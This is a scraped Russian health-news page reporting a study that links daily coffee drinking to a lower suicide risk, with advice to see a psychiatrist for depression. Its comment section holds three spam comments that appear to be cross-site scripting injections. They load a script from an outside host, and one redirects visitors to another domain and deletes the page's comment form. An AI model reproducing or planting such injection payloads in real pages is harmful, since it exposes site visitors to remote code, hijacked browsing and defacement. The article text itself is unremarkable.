Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Выпил кофе – жить охота! ...  >>  Выпил кофе – жить охота! Кофе снижает риск самоубийства!
 
Обратная связь
 

Выпил кофе – жить охота! Кофе снижает риск самоубийства!

Размер шрифта
26 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Гарвардской школы общественного здоровья (США) выяснили, что чашка кофе с утра не только бодрит и заряжает энергией, но и усиливает любовь и тягу к жизни.

Выпил кофе – жить охота! Кофе снижает риск самоубийства!

Специалисты проанализировали данные трех колоссальных исследований, которые длились более четверти века и в которых были задействованы порядка двухсот тысяч человек. Все они с определенной периодичностью опрашивались на предмет потребления кофеина из кофе и других источников (таких, как чай, шоколад и газированные напитки).

Скрупулезная статистическая обработка этого массива данных показала, что между кофеином и суицидом есть взаимосвязь. А именно: риск самоубийства среди лиц, которые ежедневно выпивают две-три чашки классического кофе в день, на 50% ниже, чем у тех, кто пьет кофе без кофеина или вовсе предпочитает другие напитки.

Майкл Лукас, глава исследовательской группы, отмечает, что данный эффект, по-видимому, связан с влиянием кофеина на нейрохимию мозга. Кофеин стимулируют продукцию таких биологически активных веществ, как серотонин, дофамин и норадреналин. Все они, так или иначе, участвуют в регуляции эмоциональной сферы; от баланса этих веществ зависит, счастливы мы или подавлены, испытываем ли удовольствие или отвращение.

Отдавая должное научной значимости этого открытия, нужно все же отметить, что кофе не поможет, если депрессия уже захватила ключевые рубежи сознания и терроризирует вас суицидальными мыслями. Поэтому если вы чувствуете, что депрессивное болото затягивает вас с головой, отправляйтесь прямиком к психиатру, а не в ближайшую кофейню.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Продукты, вызывающие запор   Ого! Чай с шоколадкой и ягодами спасет от диабета!   Как выспаться ВСЕГО за 20 минут   Какой напиток лучший для сосудов?!  
26 июня 2013Что пить, чтобы не было рака груди? 07 июня 2013Поможет ли зеленый чай похудеть?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Почему я так хочу это съесть?
5 напитков, которые защитят ваше сердце
Как похудеть, ничего не делая

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.